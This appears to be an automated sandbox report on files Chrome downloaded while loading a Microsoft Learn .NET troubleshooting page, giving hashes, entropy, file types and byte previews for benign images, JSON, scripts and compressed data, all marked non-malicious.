                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                Entropy (8bit):4.241202481433726
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):17174
                                                                                                                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1817143
                                                                                                                                                                                                Entropy (8bit):5.501007973622959
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                                Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from TOPS/20, original size modulo 2^32 5644
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1404
                                                                                                                                                                                                Entropy (8bit):7.844826186366301
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:XWMt5tnckcYPAgmVo4mOUCqhDV0c7p+oWGVsmOe+fDWoncV30N:XWCtnckio41mnl7pLTHOeie36
                                                                                                                                                                                                MD5:0C10AA37A1C096B0CA5330E0D345373A
                                                                                                                                                                                                SHA1:336AB141373D86CF95CB3D787DDF1D3A3E65E11F
                                                                                                                                                                                                SHA-256:E2625E8029266F7989F5B29E46DEC5F495649C39FC62EC013A24C96953BC1CF6
                                                                                                                                                                                                SHA-512:37D65388EDA07CE33E121F5091F62FAB70A7DC1878A5397448D2D8FBAA0BABBE828BB950C9D038FD05A411C02AC405E0D97E0EB9AC8936C1122EE19CC2BBE766
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........Xmo.6..+..5j..&...2.......h.,s.H...8.....d...E..:.....G.H.....d.?.......Er.d.....fu.a...'..d..V..;),.......%gZ.....L.R.R.T..j....a.+.'b..1.U.Z..#+.K.JR)...Y...@K...+...1$...<ZM.."?.T...S)...9...$.G..I>w|...Ji..._.htz...-.g.h.$.oGI..f.R....,K..g....5.W.l~vu::.Q........lq.......Y....#......w...h.......?.L...u........0[+...h.:..).:..{.f..P. +pw. ..f..Bbxq.$n..%..Y..........mp.E.6G.....A.'...../.V>...(j..A..j"o.....Z.....a...Nq..P.9-.5&<.9..dG...2V.S..Dsh2.i.........y.(. ..m.?V`|e..Qa.0...H..w..%D`.y0...W..8.x.2.J.-... .wH@j.Rp.tz..{P.6F..:.ic02..R..d\&..~...).|.G.f.W<.......D.l..1.i.v....Uj..i...RV..`.X.....lS9.Z#J.\S.yXj.-. ....o.b."t<..6.6A.h{].5.PV1...^...Q......p'e.i..(...O.g]{.......q{.N....)k../z....7..1v...8./.aC.]J.).&.x!..K.:.r.Pv*v.....^.....m.........D..Ejo.5,J...1..>x.H.:P..V.wH.<,v_.Ej'.@NUz..^.:.9i(c.p.u....5.|Xy.yc..a...2....,U.O.*..............9..3..*.....F.o1...r.R.......e.j.P.C.=pOm..b%<...J ":d.<tH.fm.fA...7.
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):17174
                                                                                                                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):13842
                                                                                                                                                                                                Entropy (8bit):7.802399161550213
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                                Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from TOPS/20, original size modulo 2^32 33148
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):7199
                                                                                                                                                                                                Entropy (8bit):7.9694505339325925
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:3kcoGc0bPTV9XcVf0pT7xiPjgXQkT/dPGHHi:oGfTUVUMuQkV
                                                                                                                                                                                                MD5:5A4374C7913FA382B2036C839C18E30F
                                                                                                                                                                                                SHA1:98A74928210BBD93BADA1010BF5781A79652E314
                                                                                                                                                                                                SHA-256:D158BFDDEB9AE715AC3C5C36C1128D1B510AFAF8EE41399EEEC81F7D2B09247B
                                                                                                                                                                                                SHA-512:36613FB8EDC1B3E2FF8F3EB8323D67D617EDCE569A616B9BCA7EA443BDCD55CC9DBED8F3AAED7CDEE4A73C3BFF81DF7FAF5DF8AD3483AA918FDDA04B4FBE967C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........]{s...*....r.M...t.;.7N\......P$%qC...q..~..;.... E..t.........C.>..h[......l.hu.......I...*.......A\..6z..".z..._.Yz....:....*.O..Q.5..-R..."[.6Y&.l.$,.....C.W.......+.$...I.AD..C....(}.."".....!Z...W..}T.E.W.8.D...W...8..UVxa.5J.<*l.B....g....a.Xzgg.._e.@.C...e..KA6....,*...7.(........??D..h...z%Cx./..{(64...8..!......N|..4......(...|._.A.:8(5....e...,..e.....S...J.._....X?.D..d.7h.-.<O..z)..15@.../....0.E..I(@C,#=4%h.&9.PaV.....~5.J.....`.k.....1<...*.M.O.......;..9......8.A..)....p.......e......H.y........h.;.!l.qr.....x......}..0@.....0.7.(}.....(.p........"...Z....a.av...s..E...mQ{..[.3......E+...?.K.q.....x.c{A]V..[....VqRa:.......y.I...%..7....Qgw..K}-l".$.#.......H....QPa.....?y...;.]5..PHB"."4.8A...{..[..;.O..'.=9.D.,...o.D.5..\a.....&.>...]p.P...Y.m.."...I9]..D2..........{...H.......).Sr.%....:.p.RV.......l.&.`$.W$..Hc%...:at{....Nb.."4.P #..YX....A..%.0..Qn. X..`....?.q:.Y...@...dZ%%...Y.I#?..m...`..v.........
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):5644
                                                                                                                                                                                                Entropy (8bit):4.785769732002188
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                                Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):64291
                                                                                                                                                                                                Entropy (8bit):7.964191793580486
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                                MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                                SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                                SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                                SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):35005
                                                                                                                                                                                                Entropy (8bit):7.980061050467981
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                                Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):4897
                                                                                                                                                                                                Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                                Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                Entropy (8bit):4.241202481433726
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):64291
                                                                                                                                                                                                Entropy (8bit):7.964191793580486
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                                MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                                SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                                SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                                SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1173007
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):265983
                                                                                                                                                                                                Entropy (8bit):7.998494035887672
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:6144:/mXLhIXSf1AwuU0VtSDf0Zmsq49PDdIfB92UQg:/0LhIXJTU0V2fURkqg
                                                                                                                                                                                                MD5:9304479F25D8F8AF6BDA260A6F8BDA4E
                                                                                                                                                                                                SHA1:54828173C5933B5DC8CC464D635FF59501B0D667
                                                                                                                                                                                                SHA-256:7BA3DE2A2DEC667CEE6C3C5B88D10C7C58E5E658545BEEC7A4E0F7191D18D3A9
                                                                                                                                                                                                SHA-512:57D06CC8116647136298A3F0588DDFE6533DC617497EFCA471317F19A0CCED0975B146AD7837ED84669CDD3549565611C7068F8C48A1E803BDD32350172F65A6
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:............w..(.W$|.j.1Ds.J.G.c...v,%7../D6%. ........U..7p.e.3.."z.....j.<K.e..~p....U.y<,..(....3..F..&.h.....mg.....yp...0..q....6>| _J....;?......<.J.o..A.e. ..<+..fJ...n?|.......<N.2J.$.o=...fgGo.l..}2...s.Y....8."..q*.k\G..)t?%yy..FI..vv.."......C..<....'R..>6..$;;.,I..}...y.y+%...!.4.a8..$*.-...OQ2#[.3.|z......[iVnE[..f..e.o...]/.>.rX6.n.\.....<.X..#:....$*....s...~.8.<..a./,.>.J.@....ZE.j%...V....j6!iY4..^......?z....]........p..A...+.a........iX.B.$.gd...~..}..g7..,....W#.I..Z.z.".y .... ..X..z......B......V......n...l.&..).....Q..^P4....O.....0*.....K...|>.S.....O...V.......4.....<.;..5hk.9.E1.#.X...Ew..3$..R~w...+.W.iG.`B.*d...Pa.......%%.....$....MX. L......6.5.."$..(p...)./B......b....7.'$JH4..rg.Kg.K.WM..X..-.@..zP5../.#..."..-.B.......B..6 ..O..c.L.!:..4..g.L...@.2jx....(K.;...3.xEO.O.j...4...(...y5I........WQy.,.R.y...SG...LD..x.c.A._."F...Aw..{{.{A8._.... ...v....}.l.ZK*`s..u...;L..&..8...H.....9+IQ.W..e]a./...`
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1817143
                                                                                                                                                                                                Entropy (8bit):5.501007973622959
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                Malicious:false
